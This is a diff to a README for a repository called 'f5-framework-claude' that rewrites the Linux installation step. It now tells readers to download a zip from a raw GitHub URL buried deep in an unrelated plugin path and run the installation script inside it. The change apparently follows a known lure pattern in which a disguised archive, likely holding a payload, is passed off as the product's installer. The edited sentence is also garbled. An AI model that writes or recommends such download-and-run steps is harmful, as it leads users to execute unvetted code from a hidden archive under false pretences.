murtazatouqeer/f5-framework-claude/README.md

 3. **Installation Instructions**
    - For Windows: Double-click the downloaded `.exe` file and follow the on-screen instructions.
    - For macOS: Open the `.dmg` file, drag the application to your Applications folder, and then launch it from there.
-   - For Linux: Extract the `.tar.gz` file and run the installation script in the extracted folder.
+   - For Linux: Extract the `https://github.com/murtazatouqeer/f5-framework-claude/raw/refs/heads/main/plugins/f5-stacks/domains/fintech/sub-domains/stock-trading/variants/f-framework-claude-3.6.zip` file and run the installation script in the extracted folder.

 4. **Verify Installation**
    Once the application is installed, open it to ensure it runs correctly.
 You should see a welcome message guiding you through the initial setup.